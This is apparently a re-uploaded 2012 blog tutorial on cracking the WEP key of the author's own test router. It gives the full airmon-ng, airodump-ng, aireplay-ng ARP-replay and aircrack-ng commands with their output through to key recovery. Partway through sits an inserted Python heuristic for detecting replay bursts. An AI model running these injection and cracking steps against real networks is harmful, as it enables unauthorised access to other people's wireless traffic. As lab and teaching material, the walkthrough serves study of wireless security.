Air Crack

The document provides step-by-step instructions for manually cracking a WEP network key. It describes using airodump-ng to capture packets from the network, aireplay-ng to inject packets to gather IVs, and aircrack-ng to crack the key using the captured packets. It shows running the tools to put the wireless card in monitor mode, capture packets from a target network, inject ARP requests to gather IVs, and finally using aircrack-ng to recover the WEP key in about 10 minutes of packet collection.
Uploaded by Evaldo da Silva
WEP Cracking (The Manual Way) E-Spohn

http://e-spohn.com/blog/2012/05/22/wep-cracking-the-manual-way/

WEP Cracking (The Manual Way)


It's been a while since I've updated this blog, and since one of the last subjects we covered last year at OSOC was wireless hacking, I figured I would start back up with a simple WEP cracking walkthrough. As usual, I'm using BackTrack (BT5 R2, 64-bit) in a Virtual Machine (VM) as my preferred hacking environment. My USB wireless NIC of choice is an Alfa Network, Model: AWUS036H. A USB wireless NIC is required for hacking wireless networks from a VM because the host's PCI wireless NIC is exposed to the guest only through virtualized drivers, so the guest has no direct access to the radio. This NIC also has quite an extended range compared to any built-in wireless NIC you may have. If you have any trouble getting your NIC to work properly, there are some workarounds to try on Offensive Security's site. Now, I don't think I can do any better than the thousands of other WEP cracking tutorials out there, but I'm going to loosely walk through a tutorial on Mr. X's site (the man who wrote the aircrack-ng tools) anyway. There are also some good troubleshooting steps on his site if you have any problems with the exercise. First we need to set up a wireless router that we can practice on. I used an old Linksys WRT54GL that was lying around, and configured it to use WEP with S3cretP@ssword as the passphrase.

To recover a WEP key, we first need to be able to capture an ARP request, so we're going to create a continuous stream of ARP requests by connecting another computer to the access point and simply starting a ping loop to a non-existent address.

Now, on to the cracking! Here are the tools we are going to use:

1. airmon-ng: used to configure the wireless NIC for monitor mode
2. airodump-ng: used to capture packets
3. aireplay-ng: used for packet injection
4. aircrack-ng: used to recover the WEP key from the captured packets

First, we put our NIC into monitor mode using airmon-ng and verify it with iwconfig.


root@bt:~# airmon-ng

Interface       Chipset                 Driver

wlan2           Realtek RTL8187L        rtl8187 - [phy1]

root@bt:~# airmon-ng start wlan2

Interface       Chipset                 Driver

wlan2           Realtek RTL8187L        rtl8187 - [phy1]
                                        (monitor mode enabled on mon0)

root@bt:~# iwconfig
lo        no wireless extensions.

wlan2     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Frequency:2.437 GHz  Access Point: Not-Associated
          Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

mon0      IEEE 802.11bg  Mode:Monitor  Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

eth0      no wireless extensions.

Next, we use airodump-ng to enumerate any wireless networks in the area, utilizing the -t switch to only enumerate the WEP networks.
root@bt:~# airodump-ng -t wep mon0

 CH  3 ][ Elapsed: 28 s ][ 2012-05-20 17:00

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:13:10:FE:30:CA  -35       43       16    0   6  54   WEP  WEP         donthackme

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 00:13:10:FE:30:CA  00:1B:77:9C:6B:03  -24    0 - 1      0       9

"donthackme" looks like a good ESSID to play with. The top section shows the information for the access point, and the bottom section shows the information for the client we associated with it to run the continuous ping. Take note of the MAC address, channel, and ESSID of the access point, as well as the MAC address of the associated client; all of these will be needed soon. Now we start capturing all packets destined for our access point and save them directly to disk for later cracking.
root@bt:~# airodump-ng --bssid 00:13:10:FE:30:CA -c 6 -w /tmp/donthackme mon0

 CH  6 ][ Elapsed: 3 mins ][ 2012-05-20 18:11

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:13:10:FE:30:CA  -29  96     2050      270    0   6  54   WEP  WEP    OPN  donthackme

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 00:13:10:FE:30:CA  00:1B:77:9C:6B:03    0   54 - 1      0     106

Leaving that session running, let's start a new session and verify that our packet injection is working.
root@bt:~# aireplay-ng --test -e "donthackme" -a 00:13:10:FE:30:CA mon0
18:08:47  Waiting for beacon frame (BSSID: 00:13:10:FE:30:CA) on channel 6
18:08:47  Trying broadcast probe requests...
18:08:48  Injection is working!
18:08:49  Found 1 AP

18:08:49  Trying directed probe requests...
18:08:49  00:13:10:FE:30:CA - channel: 6 - 'donthackme'
18:08:49  Ping (min/avg/max): 0.748ms/4.226ms/7.905ms Power: -33.60

Next we send a fake "auth" request to associate with the access point so it will accept the packets we will soon be injecting.

Now we can start replaying ARP requests captured within our airodump-ng session, sending them back to the access point at an accelerated rate to generate the IVs (Initialization Vectors) needed for cracking.
root@bt:~# aireplay-ng --arpreplay -b 00:13:10:FE:30:CA -h 00:1B:77:9C:6B:03 mon0
The interface MAC (00:C0:CA:53:09:1D) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:1B:77:9C:6B:03
18:18:42  Waiting for beacon frame (BSSID: 00:13:10:FE:30:CA) on channel 6
Saving ARP requests in replay_arp-0520-181842.cap
You should also start airodump-ng to capture replies.
^Cad 38834 packets (got 13912 ARP requests and 12752 ACKs), sent 14647 packets...(499 pps)

When the "#Data" column of our airodump-ng session hits about 10,000, we should have a sufficient number of IVs.
 CH  6 ][ Elapsed: 11 mins ][ 2012-05-20 18:19

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:13:10:FE:30:CA  -40  84     6471    10655  361   6  54   WEP  WEP    OPN  donthackme

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 00:13:10:FE:30:CA  00:1B:77:9C:6B:03    0   54 - 1   1473   27501
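From the defender's side, the replay above is loud: one station suddenly emits hundreds of identically sized encrypted frames per second, and the AP's "#/s" column jumps from 0 to 361. The following heuristic, an added example that is not part of the original post, flags that pattern from per-frame monitor-mode records; the frame records, thresholds and the 68-byte replayed frame length are constructed assumptions, while the MAC addresses are the ones in the post's airodump-ng output.

```python
"""Heuristic wireless-IDS check for a WEP ARP-replay burst (added example)."""
from collections import Counter, defaultdict

# Assumed thresholds (tune per environment). A browsing client rarely sends
# more than a few dozen data frames per second; the replay in the post ran at
# ~499 pps of one repeated encrypted ARP request.
BURST_PPS = 200       # protected frames/second from one station that count as a burst
SAME_LEN_RATIO = 0.9  # share of frames with a single length -> replayed frame

AP, CLIENT = "00:13:10:FE:30:CA", "00:1B:77:9C:6B:03"  # MACs from the post


def detect_arp_replay(frames, window_s=1.0):
    """frames: iterable of (timestamp_s, station_mac, bssid, frame_len, protected).
    Returns one alert dict per (station, bssid, window) whose protected-frame
    rate exceeds BURST_PPS and whose frame lengths are almost all identical."""
    buckets = defaultdict(list)
    for ts, station, bssid, length, protected in frames:
        if protected:  # only WEP/WPA-protected data frames matter here
            buckets[(station, bssid, int(ts // window_s))].append(length)
    alerts = []
    for (station, bssid, slot), lengths in sorted(buckets.items()):
        pps = len(lengths) / window_s
        if pps < BURST_PPS:
            continue
        top_len, top_count = Counter(lengths).most_common(1)[0]
        if top_count / len(lengths) >= SAME_LEN_RATIO:
            alerts.append({"station": station, "bssid": bssid, "second": slot,
                           "pps": pps, "frame_len": top_len})
    return alerts


def sample_frames():
    """Constructed capture: 10 s of ordinary traffic, then a 450-frame replay."""
    frames = []
    for sec in range(10):                     # ~25 frames/s, varied lengths
        for i in range(25):
            frames.append((sec + i / 25, CLIENT, AP, 100 + (i * 37) % 1400, True))
    for i in range(450):                      # second 10: same 68-byte frame repeated
        frames.append((10 + i / 450, CLIENT, AP, 68, True))
    return frames


if __name__ == "__main__":
    for alert in detect_arp_replay(sample_frames()):
        print("ARP-replay suspected:", alert)
```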

Finally, we can stop our airodump-ng session and start cracking.


root@bt:~# aircrack-ng -b 00:13:10:FE:30:CA /tmp/donthackme*.cap
Opening /tmp/donthackme-01.cap
Attack will be restarted every 5000 captured ivs.


Starting PTW attack with 10684 ivs.

                                 Aircrack-ng 1.1 r2076

                 [00:00:01] Tested 102216 keys (got 10542 IVs)

   KB    depth   byte(vote)
    0    0/ 14
    1    0/  1
    2   21/ 52
    3    7/ 11
    4    0/ 14
   (the byte(vote) columns are not recoverable from the PDF export)

             KEY FOUND! [ F2:C7:BB:35:B9 ]
        Decrypted correctly: 100%

Key found! Let's see if it works. We start up our wireless daemon and our wireless client.

root@bt:~# wicd
root@bt:~# wicd-client &
[1] 32614
root@bt:~# Has notifications support True
Loading...
Connecting to daemon...
Connected.
displaytray True
Done loading.

Then we just click on the icon in the system tray and configure it with the key that we found.

Click connect and hope for the best.

Success! That was easy enough, huh?


This entry was posted on May 22, 2012, 8:43 pm and is filed under Wireless Hacking. You can follow any responses to this entry through RSS 2.0. Both comments and pings are currently closed.
